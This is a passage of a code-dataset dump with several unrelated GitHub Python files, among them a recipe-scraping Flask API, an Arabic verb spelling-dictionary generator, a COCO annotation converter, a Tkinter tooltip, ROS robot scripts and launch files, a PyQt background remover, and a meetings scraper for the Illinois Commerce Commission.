print('recipes_contact_card_desc = ', recipes_contact_card_desc)\n recipes_contact_card_link = recipes_contact_card.find('a')['href']\n # print('recipes_contact_card_link = ', recipes_contact_card_link)\n recipes_contact_card_title = recipes_contact_card.find('h2').getText()\n # print('recipes_contact_card_title = ', recipes_contact_card_title)\n data_list.append({'card_link':recipes_contact_card_link , 'card_title': recipes_contact_card_title,'card_img':recipes_contact_card_img , 'card_desc': recipes_contact_card_desc})\n \n # content = recipes_contact_card.getText()\n # print('content = ', content)\n json_string = json.dumps({'data': data_list})\n # 爬完匯入到json檔\n save_path = 'D:/tailwind_recipes/src/jsonfile'\n complete_name = os.path.join(save_path,'recipes_category.json') \n with open(complete_name, 'w') as outfile:\n outfile.write(json_string)\n\n return jsonify({'data': data_list})\n\n@app.route('/api/goodfoodcollection', methods=['GET', 'POST'])\ndef get_recipes_collection():\n url = \"https://www.bbcgoodfood.com\" + request.get_json()['collection']\n headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n params = {}\n response = requests.get(url, headers=headers, params=params)\n soup = bs4.BeautifulSoup(response.text, \"html.parser\")\n # print(soup)\n recipes_collection = soup.find_all('article', class_='card text-align-left card--horizontal card--inline')\n\n data_list=[]\n for 
collection_contact_card in recipes_collection:\n collection_contact_card_img = collection_contact_card.find('img')['src']\n # print('collection_contact_card_img = ', collection_contact_card_img)\n collection_contact_card_desc = collection_contact_card.find('p').getText()\n # print('collection_contact_card_desc = ', collection_contact_card_desc)\n collection_contact_card_link = collection_contact_card.find('a')['href']\n # print('collection_contact_card_link = ', collection_contact_card_link)\n collection_contact_card_title = collection_contact_card.find('h2').getText()\n # print('collection_contact_card_title = ', collection_contact_card_title)\n collection_contact_card_rating = collection_contact_card.find('span', class_='rating__count-text body-copy-small').getText()\n data_list.append({'card_rating': collection_contact_card_rating,'card_link':collection_contact_card_link , 'card_title': collection_contact_card_title,'card_img':collection_contact_card_img , 'card_desc': collection_contact_card_desc})\n\n json_string = json.dumps({'data': data_list})\n # 爬完匯入到json檔\n save_path = 'D:/tailwind_recipes/src/jsonfile'\n complete_name = os.path.join(save_path,'recipes_collection'+request.get_json()['type'].replace(\":\", \"\")) \n if os.path.exists(complete_name):\n with open(complete_name+'.json', 'r') as outfile:\n old_data = outfile.read()\n\n with open(complete_name +'.json', 'w') as outfile:\n outfile.write(json_string)\n\n return jsonify({'data': data_list})\n\n@app.route('/api/goodfoodrecipescontact', methods=['GET', 'POST'])\ndef get_recipes_contact():\n url = \"https://www.bbcgoodfood.com\" + request.get_json()['cardLink']\n headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n params = {}\n response = requests.get(url, headers=headers, params=params)\n soup = bs4.BeautifulSoup(response.text, \"html.parser\")\n # print(soup)\n recipes_title = soup.find_all('h1', class_='heading-1')\n recipes_ingredients_items = soup.find_all('li', class_='pb-xxs pt-xxs list-item list-item--separator')\n recipes_method_items = soup.find_all('li', class_='pb-xs pt-xs list-item')\n \n ingredients=[]\n method=[]\n\n for title in recipes_title:\n title_text = title.getText()\n\n for items in recipes_ingredients_items:\n ingredients_items = items.getText()\n ingredients.append(ingredients_items)\n\n for steps in recipes_method_items:\n steps_heading = steps.find('span').getText()\n steps_editor_conten = steps.find('div').getText()\n method.append({'steps_heading': steps_heading, 'steps_editor_conten': steps_editor_conten})\n\n json_string = json.dumps({'data': {'title':title_text, 'ingredients':ingredients, 'method':method}})\n # # 爬完匯入到json檔\n save_path = 'D:/tailwind_recipes/src/jsonfile'\n complete_name = os.path.join(save_path,'recipes_contact_'+title_text) \n if os.path.exists(complete_name):\n with open(complete_name+'.json', 'r') as outfile:\n old_data = outfile.read()\n\n with open(complete_name +'.json', 'w') as outfile:\n outfile.write(json_string)\n\n return jsonify({'data': {'title':title_text, 'ingredients':ingredients, 'method':method}})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"changshuyi/tailwind_recipes","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37264622348","text":"import csvdict\nimport verbdict_functions as vdf\nimport pyarabic.araby as araby\nimport spellverbconst as 
svconst\nimport spellverb as vspell\nimport libqutrub.mosaref_main as msrif\nimport libqutrub.ar_verb as v_ar\nimport libqutrub.verb_valid as valid\nimport libqutrub.verb_const as const\n\nclass SpellDict(csvdict.CsvDict):\n \"\"\" a virtual converter of data from table to specific Hunspell dictionary format\n the data is big, then every function print string \"\"\"\n def __init__(self, version = \"N/A\", ):\n \"\"\"\n initiate the dict\n \"\"\"\n csvdict.CsvDict.__init__(self, version)\n def add_header(self,):\n \"\"\"\n add the header for new dict\n \"\"\"\n line = \"#\" + \"\\n##\".join(self.headerlines) +\"\\n\" \n return line\n \n def add_record(self, verb_row):\n \"\"\"\n Add a new to the dict\n \"\"\"\n self.id +=1\n v = self.treat_tuple(verb_row)\n line = \"\"\n \n \n # display fields to ensure corectness\n VERIFY_INPUT=False;\n #~ VERIFY_INPUT = True;\n if VERIFY_INPUT: \n self.test_entry(v)\n\n # conjugate the verb with speling tags\n if not valid.is_valid_infinitive_verb(v['vocalized']):\n line += u\"#\\t\\tis invalid verb\\n\",v['vocalized'].encode(\"utf8\")\n else:\n future_type = v_ar.get_future_type_entree(v['future_type']);\n conjugTable = msrif.do_sarf( v['vocalized'], v['future_type'], v['all'], v['past'],\n v['future'], v['passive'], v['imperative'],\n v['future_moode'], v['confirmed'], v['transitive'], \n \"DICT\");\n TableEntries = {}\n if conjugTable: \n TableEntries = {}\n\n for tense in conjugTable.keys():\n for pronoun in conjugTable[tense].keys():\n if pronoun != const.PronounAntuma_f: \n\n flags = svconst.TabPrefixes[tense]['full'];\n\n # the passive tenses dont take object suffix, only with double transitie verbs\n if (v['transitive'] and tense in const.TableIndicativeTense) or v['double_trans']:#:\n \n # add flags for suffixes\n if v['think_trans'] and v['reflexive_trans']: \n flags += svconst.TabSuffixesPronominale[pronoun]['full'];\n else:\n flags += svconst.TabSuffixes[pronoun]['full'];\n \n # add flag yeh for the الأفعال الخمسة \n if tense == const.TenseFuture and pronoun in (const.PronounAnti, const.PronounAntuma, const.PronounAntuma_f, \n const.PronounAntum, const.PronounHuma, const.PronounHuma_f, const.PronounHum ):\n flags+=u\"Ha\"; \n \n # add double object suffixe, if the verb is double transitive, and the tense is indicative \n if v['double_trans'] and tense in const.TableIndicativeTense:\n \n # add flags for suffixes (double object)\n flags += svconst.TabDisplayTagDouble[pronoun]['full'];\n \n #add an entree to the table entrie\n # this allows to reduce many cases into one entree\n word_nm = araby.strip_tashkeel(conjugTable[tense][pronoun]);\n if TableEntries.has_key(word_nm):\n TableEntries[word_nm] += flags;\n else:\n TableEntries[word_nm] = flags;\n #print (u'%s/%s\\t%s%s'%(ar_strip_marks(conjugTable[tense][pronoun]), flags, word,verb_cat));\n # print element from the TableEntries\n for key in TableEntries.keys():\n if key!=\"\":\n line +=u'%s/%s\\n'%(key, vspell.unify_flags(TableEntries[key])) \n \n return line\n \n \n def test_entry(self, verb_tuple):\n \"\"\"\n Verify entrie\n \"\"\" \n print(\"------------------------------\");\n print(u\"\\t\".join(['word', verb_tuple['word']]));\n print(u\"\\t\".join(['future_type', verb_tuple['future_type']]));\n print(u\"\\t\".join(['transitive',str(verb_tuple['transitive']), ]));\n print(u\"\\t\".join(['double_trans',str(verb_tuple['double_trans']), ]));\n print(u\"\\t\".join(['think_trans',str(verb_tuple['think_trans']), ]));\n print(u\"\\t\".join(['unthink_trans',str(verb_tuple['unthink_trans']), 
]));\n print(u\"\\t\".join(['reflexive_trans',str(verb_tuple['reflexive_trans']), ]));\n if all:\n tenses=u\"يعملان\";\n else:\n tenses=u\"\";\n if verb_tuple['past']: tenses+=u\"ي\";\n else: tenses+=\"-\";\n if verb_tuple['future']: tenses+=u\"ع\";\n else: tenses+=\"-\";\n if verb_tuple['imperative']: tenses+=u\"م\";\n else: tenses+=\"-\";\n if verb_tuple['passive']: tenses+=u\"ل\";\n else: tenses+=u\"-\";\n if verb_tuple['future_moode']: tenses+=u\"ا\";\n else: tenses+=u\"-\";\n if verb_tuple['confirmed']: tenses+=u\"ن\";\n else: tenses+=u\"-\";\n print(u\"\\t\".join(['tense', tenses]));\n print(\"------------------------------\");\n \n def add_footer(self):\n \"\"\"close the data set, used for ending xml, or sql\"\"\"\n \n return \"\"\"\"\"\"\n","repo_name":"linuxscout/arramooz","sub_path":"scripts/verbs/spelldict.py","file_name":"spelldict.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"47"} +{"seq_id":"7945368070","text":"import datetime\nimport json\nimport os\n\nimport numpy as np\n\n# sys.path.append(\"/root/autodl-tmp/archive/metrics\")\nfrom .data_transformer import get_transformer\nfrom .pycococreatortools import create_annotation_info, create_image_info\n\n\ndef convert_to_coco(dataset_name, data_dir, save_path, test_mode=False):\n \"\"\"\n Convert experimental datasets to COCO format.\n\n Args:\n dataset_name:\n\n\n Returns:\n\n \"\"\"\n # save_path = os.path.join(save_dir, \"annotations.json\")\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n\n # Get the corresponding class for the given dataset and initialize the class with the dataset dir.\n transformer = get_transformer(dataset_name)(data_dir)\n\n CATEGORIES = transformer.category\n INFO = {\n \"description\": \"Dataset in coco format\",\n \"url\": \"https://github.com/waspinator/pycococreator\",\n \"version\": \"0.1.0\",\n \"year\": 2023,\n \"contributor\": \"weifeiouyang\",\n \"date_created\": datetime.datetime.utcnow().isoformat(\" \"),\n }\n\n LICENSES = [\n {\n \"id\": 1,\n \"name\": \"Attribution-NonCommercial-ShareAlike License\",\n \"url\": \"http://creativecommons.org/licenses/by-nc-sa/2.0/\",\n }\n ]\n\n coco_output = {\n \"info\": INFO,\n \"licenses\": LICENSES,\n \"categories\": CATEGORIES,\n \"images\": [],\n \"annotations\": [],\n }\n\n image_id = 1\n segmentation_id = 1\n\n exs = []\n # get path of imgs\n images_files = transformer.imgs\n for image_filename in images_files:\n print(image_filename)\n image = transformer.load_img(image_filename)\n image_info = create_image_info(\n image_id, os.path.basename(image_filename), image.shape[:2]\n )\n coco_output[\"images\"].append(image_info)\n\n # get ann for this img.\n # basename = pathlib.Path(image_filename).stem\n # inst = load_img(opj(INST_DIR, \"{}.npy\".format(basename)))\n # ann_path = transformer.load_ann_path(image_filename)\n try:\n ann = transformer.load_ann_for_patch(image_filename)\n except:\n ann = transformer.load_ann(image_filename)\n\n # ann = transformer.load_ann(image_filename)\n\n inst = ann[:, :, 0]\n inst_ids = np.unique(inst)[1:]\n type_mask = ann[:, :, 1]\n # type_mask = load_img(opj(TYPE_DIR, \"{}.png\".format(basename)))\n\n for inst_id in inst_ids:\n # if inst_id == 78:\n # pass\n binary_mask = np.where(inst == inst_id, 1, 0)\n try:\n # 去除0之后的那个id; 有的图片是只有0,这种图片就直接跳过?\n class_id = np.unique(np.where(inst == inst_id, type_mask, 0))\n if len(class_id) > 2:\n # raise \"you have more than one type in one instance!\"\n ex = 
[image_filename, inst_id, class_id]\n exs.append(ex)\n print(ex)\n # else:\n class_id = class_id[1]\n category_info = {\"id\": int(class_id), \"is_crowd\": 0}\n annotation_info = create_annotation_info(\n segmentation_id,\n image_id,\n category_info,\n binary_mask,\n binary_mask.shape,\n tolerance=2,\n )\n if annotation_info is not None:\n coco_output[\"annotations\"].append(annotation_info)\n except Exception as e:\n print(\"error\", e)\n continue\n\n segmentation_id = segmentation_id + 1\n\n image_id = image_id + 1\n\n # test mode will not save result\n if not test_mode:\n with open(save_path, \"w\") as output_json_file:\n json.dump(coco_output, output_json_file)\n","repo_name":"RessCris2/pannuke_app","sub_path":"src/data_process/convert2coco.py","file_name":"convert2coco.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37709924867","text":"import numpy as np\nimport pandas as pd\nfrom libs.figures.connectivity_spaces import clusters_as_dots\nfrom libs.tools.ppfm import get_hemisphere_subject_pp\nfrom configuration.configuration import (\n PPFM_TABLES,\n U_FIBERS_COORD,\n HEMI_INDEXES_FILT,\n SIDES,\n CLUSTERING_LABELS,\n SUBJ_LIST,\n FIG_CLUSTERS_INDIV_SPACE,\n)\n\nif __name__ == \"__main__\":\n\n ppfm = pd.read_csv(PPFM_TABLES[\"final\"])\n data = np.load(U_FIBERS_COORD[\"iso\"])\n hemispheres_index = np.load(HEMI_INDEXES_FILT)\n side_index = np.mod(hemispheres_index, 2)\n\n for j, side in enumerate(SIDES.keys()):\n labels = np.load(CLUSTERING_LABELS[side])\n data_ = data[side_index == j]\n data_ = data_[labels != -1]\n labels_ = labels[labels != -1]\n hemi_index = hemispheres_index[side_index == j]\n hemi_index = hemi_index[labels != -1]\n\n for i, subject in enumerate(SUBJ_LIST):\n index = i * len(SIDES) + j\n data_sub = data_[hemi_index == index]\n labels_sub = labels_[hemi_index == index]\n\n title = None\n subject_pp = get_hemisphere_subject_pp(ppfm, subject, side)\n path_fig = FIG_CLUSTERS_INDIV_SPACE[(subject, side)]\n\n clusters_as_dots(\n data_sub,\n labels_sub,\n path_fig=path_fig,\n ppfm=subject_pp,\n ppfm_label=\"Individual PPFM\",\n title=title\n )\n","repo_name":"alexpron/article_central_sulcus_connectivity","sub_path":"scripts/figures/clustering/group_clusters_subjects_space.py","file_name":"group_clusters_subjects_space.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"43186208037","text":"if __name__ == \"__main__\": # For stand-alone testing with parallel TkUtil\n import os\n import sys\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),\n \"..\")))\nimport tkinter as tk\nimport tkinter.ttk as ttk\nimport tkinter.font as tkfont\nimport TkUtil\n\n\nclass Tooltip:\n\n def __init__(self, master, text, delay=1200, showTime=10000,\n background=\"lightyellow\"):\n self.master = master\n self.text = text\n self.delay = delay\n self.showTime = showTime\n self.background = background\n self.timerId = None\n self.tip = None\n self.master.bind(\"\", self.enter, \"+\")\n self.master.bind(\"\", self.leave, \"+\")\n\n \n def enter(self, event=None):\n if self.timerId is None and self.tip is None:\n self.timerId = self.master.after(self.delay, self.show)\n \n\n def leave(self, event=None):\n if self.timerId is not None:\n id = self.timerId\n self.timerId = None\n self.master.after_cancel(id)\n self.hide()\n\n\n def hide(self):\n if self.tip is not 
None:\n tip = self.tip\n self.tip = None\n tip.destroy()\n\n\n def show(self):\n self.leave()\n self.tip = tk.Toplevel(self.master)\n self.tip.withdraw() # Don't show until we have the geometry\n self.tip.wm_overrideredirect(True) # No window decorations etc.\n if TkUtil.mac():\n self.tip.tk.call(\"::tk::unsupported::MacWindowStyle\",\n \"style\", self.tip._w, \"help\", \"none\")\n label = ttk.Label(self.tip, text=self.text, padding=1,\n background=self.background, wraplength=480,\n relief=None if TkUtil.mac() else tk.GROOVE,\n font=tkfont.nametofont(\"TkTooltipFont\"))\n label.pack()\n x, y = self.position()\n self.tip.wm_geometry(\"+{}+{}\".format(x, y))\n self.tip.deiconify()\n if self.master.winfo_viewable():\n self.tip.transient(self.master)\n self.tip.update_idletasks()\n self.timerId = self.master.after(self.showTime, self.hide)\n\n \n def position(self):\n tipx = self.tip.winfo_reqwidth()\n tipy = self.tip.winfo_reqheight()\n width = self.tip.winfo_screenwidth()\n height = self.tip.winfo_screenheight()\n y = self.master.winfo_rooty() + self.master.winfo_height()\n if y + tipy > height:\n y = self.master.winfo_rooty() - tipy\n x = self.tip.winfo_pointerx()\n if x < 0:\n x = 0\n elif x + tipx > width:\n x = width - tipx\n return x, y\n\n\nif __name__ == \"__main__\":\n if sys.stdout.isatty():\n application = tk.Tk()\n application.title(\"Tooltip\")\n box = tk.Listbox(application)\n box.insert(\"end\", \"This is a listbox\")\n box.pack(side=\"top\")\n Tooltip(box, text=\"This is a tooltip with all the options left at \"\n \" their default values, so this is what you get if you just \"\n \" give a tooltip text\")\n button = tk.Button(application, text=\"Quit\",\n command=application.quit)\n button.pack(side=\"bottom\")\n Tooltip(button, text=\"Click to Terminate\")\n application.mainloop()\n else:\n print(\"Loaded OK\")\n","repo_name":"lovexiaov/python-in-practice","sub_path":"TkUtil/Tooltip.py","file_name":"Tooltip.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"47"} +{"seq_id":"12608162895","text":"#!/usr/bin/env python2\n\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom geometry_msgs.msg import Pose\n# from nav_msgs import Odometry\n\nglobal_msg = None\npi_2 = 1.5708\n\ndef callback(msg):\n global_msg = msg \n\ndef quat2yaw(q):\n return atan(2 * (q.x * q.y + q.w * q.z)/(q.w ** 2 + q.x ** 2 - q.y ** 2 - q.z**2))\n \ndef mround():\n rospy.init_node(\"circular_motion\")\n pub = rospy.Publisher(\"/cmd_vel_mux/input/teleop\", Twist, queue_size=0)\n # sub = rospy.Subscribe(\"/odom/\", Odometry, callback)\n rate = rospy.Rate(10)\n vel = Twist()\n vel.angular.z = 1\n vel.linear.x = 0.25\n\n while not rospy.is_shutdown():\n pub.publish(vel)\n rate.sleep()\n'''\n for i in range(0,4):\n initial_position = global_msg.position\n distance = 0\n \n while not rospy.is_shutdown() and distance < 1:\n pub.publish(vel)\n dx = initial_position.x - global_msg.position.x\n dy = initial_position.y - global_msg.position.y\n distance = sqrt(dx**2 + dy**2)\n vel.linear.x = 0\n vel.angular.z = 1\n yaw = quat2yaw(global_msg.pose.pose.orientation)\n while not rospy.is_shutdown() and yaw < pi_2:\n pub.publish(vel)\n vel.linear.x = 0.5\n '''\n","repo_name":"corwinmacmillan/ME597","sub_path":"src/cmotion/src/cmotion/mround.py","file_name":"mround.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} 
+{"seq_id":"12778873132","text":"import cv2\nimport numpy as np\nfrom PIL import Image\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QFileDialog, QLabel, QPushButton\n\n# Variables globales\nruta_imagen = None\nimagen_cargada = None\n\n# Función para cargar la imagen al hacer clic en el botón \"Cargar imagen\"\ndef cargar_imagen():\n global ruta_imagen, imagen_cargada\n ruta_imagen, _ = QFileDialog.getOpenFileName(options=QFileDialog.Options()) # Ventana de diálogo para seleccionar un archivo\n imagen_cargada = QtGui.QPixmap(ruta_imagen) # Cargar la imagen seleccionada\n etiqueta_imagen.setPixmap(imagen_cargada.scaledToHeight(1080, QtCore.Qt.SmoothTransformation))\n\n# Función para descargar la imagen con el fondo removido al hacer clic en el botón \"Descargar imagen\"\ndef descargar_imagen():\n global ruta_imagen, imagen_cargada\n if ruta_imagen is None:\n return # No se ha cargado ninguna imagen previamente\n \n # Cargar la imagen utilizando OpenCV\n imagen_cv = cv2.imread(ruta_imagen)\n\n # Convertir la imagen de BGR a RGB\n imagen_rgb = cv2.cvtColor(imagen_cv, cv2.COLOR_BGR2RGB)\n\n # Redimensionar la imagen si es necesario\n max_size = (1920, 1080) # Tamaño máximo permitido (1080p)\n imagen_rgb = cv2.resize(imagen_rgb, max_size)\n\n # Crear una máscara inicial para la segmentación\n mascara = np.zeros(imagen_rgb.shape[:2], np.uint8)\n\n # Detectar contornos en la imagen\n contornos, _ = cv2.findContours(mascara, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Encontrar el contorno más grande (supuesto objeto principal)\n contorno_objeto = max(contornos, key=cv2.contourArea)\n\n # Obtener el rectángulo delimitador del contorno\n x, y, w, h = cv2.boundingRect(contorno_objeto)\n\n # Ajustar la región de interés alrededor del objeto\n rect = (x, y, x + w, y + h)\n\n # Aplicar el algoritmo GrabCut para remover el fondo\n cv2.grabCut(imagen_rgb, mascara, rect, None, None, 5, cv2.GC_INIT_WITH_RECT)\n\n # Crear una máscara binaria donde los píxeles con valores 0 y 2 son considerados fondo, y los píxeles con valores 1 y 3 son considerados primer plano\n mascara_binaria = np.where((mascara == 2) | (mascara == 0), 0, 1).astype('uint8')\n\n # Aplicar la máscara al objeto principal en la imagen original\n imagen_final = imagen_rgb * mascara_binaria[:, :, np.newaxis]\n\n # Convertir la imagen final a formato PIL y corregir el perfil de color\n imagen_final_pil = Image.fromarray(imagen_final)\n imagen_final_pil = imagen_final_pil.convert(\"RGB\")\n\n # Guardar la imagen con el fondo removido\n ruta_guardado, _ = QFileDialog.getSaveFileName(None, \"Guardar imagen\", \"\", \"JPEG Files (*.jpg);;PNG Files (*.png)\") # Ventana de diálogo para guardar la imagen\n imagen_final_pil.save(ruta_guardado)\n print(\"Imagen guardada con éxito (fondo removido)\")\n\n# Crear la aplicación y la ventana principal\napp = QtWidgets.QApplication([])\napp.setStyle('Fusion') # Establecer el estilo de la aplicación como Fusion\n\n# Crear una paleta de colores personalizada para los botones\npaleta = QtGui.QPalette()\npaleta.setColor(QtGui.QPalette.Button, QtGui.QColor(53, 53, 53))\npaleta.setColor(QtGui.QPalette.ButtonText, QtGui.QColor(255, 255, 255))\n\n# Establecer la paleta de colores personalizada para los botones\napp.setPalette(paleta)\n\n# Establecer estilos CSS para los botones y la ventana principal\nestilos = \"\"\"\n QMainWindow {\n background-color: #333;\n }\n\n QPushButton {\n background-color: #555;\n color: #FFF;\n padding: 8px 16px;\n border-radius: 4px;\n }\n\n 
QPushButton:hover {\n background-color: #888;\n }\n\n QLabel {\n background-color: #000;\n border: 1px solid #FFF;\n }\n\"\"\"\n\n# Crear la ventana principal\nventana = QtWidgets.QMainWindow()\nventana.setStyleSheet(estilos)\n\n# Crear el botón \"Cargar imagen\"\nboton_cargar = QPushButton(\"Cargar imagen\", ventana)\nboton_cargar.clicked.connect(cargar_imagen)\nboton_cargar.setGeometry(QtCore.QRect(10, 10, 150, 30))\n\n# Crear el botón \"Descargar imagen\"\nboton_descargar = QPushButton(\"Descargar imagen\", ventana)\nboton_descargar.clicked.connect(descargar_imagen)\nboton_descargar.setGeometry(QtCore.QRect(10, 50, 150, 30))\n\n# Crear una etiqueta para mostrar la imagen\netiqueta_imagen = QLabel(ventana)\netiqueta_imagen.setGeometry(QtCore.QRect(180, 10, 1024, 720))\n\n# Mostrar la ventana principal\nventana.show()\napp.exec()\n","repo_name":"solidsnk86/background-remover","sub_path":"bg-remover.py","file_name":"bg-remover.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"15782228401","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\n\nfrom launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument, IncludeLaunchDescription, SetEnvironmentVariable\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import LaunchConfiguration\nfrom launch_ros.actions import Node\n\n\ndef generate_launch_description():\n # Get the launch directory\n example_dir = get_package_share_directory('problem5')\n namespace = LaunchConfiguration('namespace')\n\n declare_namespace_cmd = DeclareLaunchArgument(\n 'namespace',\n default_value='',\n description='Namespace')\n\n plansys2_cmd = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(os.path.join(\n get_package_share_directory('plansys2_bringup'),\n 'launch',\n 'plansys2_bringup_launch_monolithic.py')),\n launch_arguments={\n 'model_file': example_dir + '/pddl/domain-simple.pddl',\n 'namespace': namespace\n }.items())\n\n # Specify the actions\n move_cmd = Node(\n package='problem5',\n executable='move_node',\n name='move_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n \n move_with_box_cmd = Node(\n package='problem5',\n executable='move_with_box_node',\n name='move_with_box_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n \n move_with_box2_cmd = Node(\n package='problem5',\n executable='move_with_box2_node',\n name='move_with_box2_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n move_with_box3_cmd = Node(\n package='problem5',\n executable='move_with_box3_node',\n name='move_with_box3_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n move_with_box4_cmd = Node(\n package='problem5',\n executable='move_with_box4_node',\n name='move_with_box4_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n fill_item_cmd = Node(\n package='problem5',\n executable='fill_item_node',\n name='fill_item_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n load_carrier_cmd = Node(\n package='problem5',\n executable='load_carrier_node',\n name='load_carrier_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n unloadrobot_cmd = Node(\n package='problem5',\n executable='unloadrobot_node',\n name='unloadrobot_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n empty_box_food_cmd = Node(\n package='problem5',\n 
executable='empty_box_food_node',\n name='empty_box_food_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n empty_box_medicine_cmd = Node(\n package='problem5',\n executable='empty_box_medicine_node',\n name='empty_box_medicine_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n \n empty_box_tool_cmd = Node(\n package='problem5',\n executable='empty_box_tool_node',\n name='empty_box_tool_node',\n namespace=namespace,\n output='screen',\n parameters=[])\n\n\n\n\n\n ld = LaunchDescription()\n\n # Set environment variables\n ld.add_action(declare_namespace_cmd)\n\n # Declare the launch options\n ld.add_action(plansys2_cmd)\n\n ld.add_action(move_cmd)\n ld.add_action(move_with_box_cmd)\n ld.add_action(move_with_box2_cmd)\n ld.add_action(move_with_box3_cmd)\n ld.add_action(move_with_box4_cmd)\n ld.add_action(load_carrier_cmd)\n ld.add_action(fill_item_cmd)\n ld.add_action(unloadrobot_cmd)\n ld.add_action(empty_box_food_cmd)\n ld.add_action(empty_box_medicine_cmd)\n ld.add_action(empty_box_tool_cmd)\n\n return ld\n","repo_name":"pierlucafaccin/automated-planning-project","sub_path":"problem5/launch/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"10815756784","text":"import re\nfrom datetime import datetime\n\nfrom city_scrapers_core.constants import ADVISORY_COMMITTEE, COMMISSION, COMMITTEE\nfrom city_scrapers_core.items import Meeting\nfrom city_scrapers_core.spiders import CityScrapersSpider\n\n\nclass IlCommerceSpider(CityScrapersSpider):\n name = \"il_commerce\"\n agency = \"Illinois Commerce Commission\"\n timezone = \"America/Chicago\"\n start_urls = [\n \"https://www.icc.illinois.gov/meetings/default.aspx?dts=32&et=1&et=5&et=3\"\n ]\n\n def parse(self, response):\n \"\"\"\n `parse` should always `yield` Meeting items.\n\n Change the `_parse_title`, `_parse_start`, etc methods to fit your scraping\n needs.\n \"\"\"\n for nav_link in response.css(\".col-sm-7 a.btn\"):\n if \"?bd=\" in nav_link.attrib[\"href\"]:\n yield response.follow(\n nav_link.attrib[\"href\"], callback=self._parse_events_page\n )\n\n yield from self._parse_events_page(response)\n\n def _parse_events_page(self, response):\n for item in response.css(\".panel-body a\"):\n yield response.follow(item.attrib[\"href\"], callback=self._parse_detail)\n\n def _parse_detail(self, response):\n title = self._parse_title(response)\n meeting = Meeting(\n title=title,\n description=self._parse_description(response),\n classification=self._parse_classification(title),\n start=self._parse_start(response),\n end=None,\n all_day=False,\n time_notes=\"\",\n location=self._parse_location(response),\n links=self._parse_links(response),\n source=response.url,\n )\n\n meeting[\"status\"] = self._get_status(\n meeting, text=\" \".join(response.css(\".col-sm-12 *::text\").extract())\n )\n meeting[\"id\"] = self._get_id(meeting)\n\n yield meeting\n\n def _parse_title(self, response):\n \"\"\"Parse or generate meeting title.\"\"\"\n title_str = re.sub(\n r\"\\s+\", \" \", \" \".join(response.css(\".soi-container h2 *::text\").extract())\n ).strip()\n return re.sub(\n r\"(Illinois Commerce Commission|(?=Committee )Committee Meeting$)\",\n \"\",\n title_str,\n ).strip()\n\n def _parse_description(self, response):\n \"\"\"Parse or generate meeting description.\"\"\"\n return re.sub(\n r\"\\s+\", \" \", \" \".join(response.css(\".col-sm-12 > p *::text\").extract())\n 
).strip()\n\n def _parse_classification(self, title):\n \"\"\"Parse or generate classification from allowed options.\"\"\"\n if \"advisory\" in title.lower():\n return ADVISORY_COMMITTEE\n if \"committee\" in title.lower():\n return COMMITTEE\n return COMMISSION\n\n def _parse_start(self, response):\n \"\"\"Parse start datetime as a naive datetime object.\"\"\"\n start_str = \" \".join(response.css(\"h3.mt-4 *::text\").extract())\n dt_str = re.search(\n r\"[A-Z][a-z]{2,8} \\d{1,2}, \\d{4} \\d{1,2}:\\d{2} [APM]{2}\", start_str\n ).group()\n return datetime.strptime(dt_str, \"%B %d, %Y %I:%M %p\")\n\n def _parse_location(self, response):\n \"\"\"Parse or generate location.\"\"\"\n location_block = response.css(\".row.mt-4 > .col-12\")[0]\n location_items = location_block.css(\"p *::text\").extract()\n addr_items = [\n i.strip() for i in location_items if \"Building\" not in i and i.strip()\n ]\n name_items = [\n i.strip() for i in location_items if \"Building\" in i and i.strip()\n ]\n return {\n \"address\": \" \".join(addr_items),\n \"name\": \" \".join(name_items),\n }\n\n def _parse_links(self, response):\n \"\"\"Parse or generate links.\"\"\"\n links = []\n for link in response.css(\".row.mt-4 .list-unstyled a\"):\n links.append(\n {\n \"title\": \" \".join(link.css(\"*::text\").extract()).strip(),\n \"href\": response.urljoin(link.attrib[\"href\"]),\n }\n )\n return links\n","repo_name":"City-Bureau/city-scrapers","sub_path":"city_scrapers/spiders/il_commerce.py","file_name":"il_commerce.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":309,"dataset":"github-code","pt":"47"} 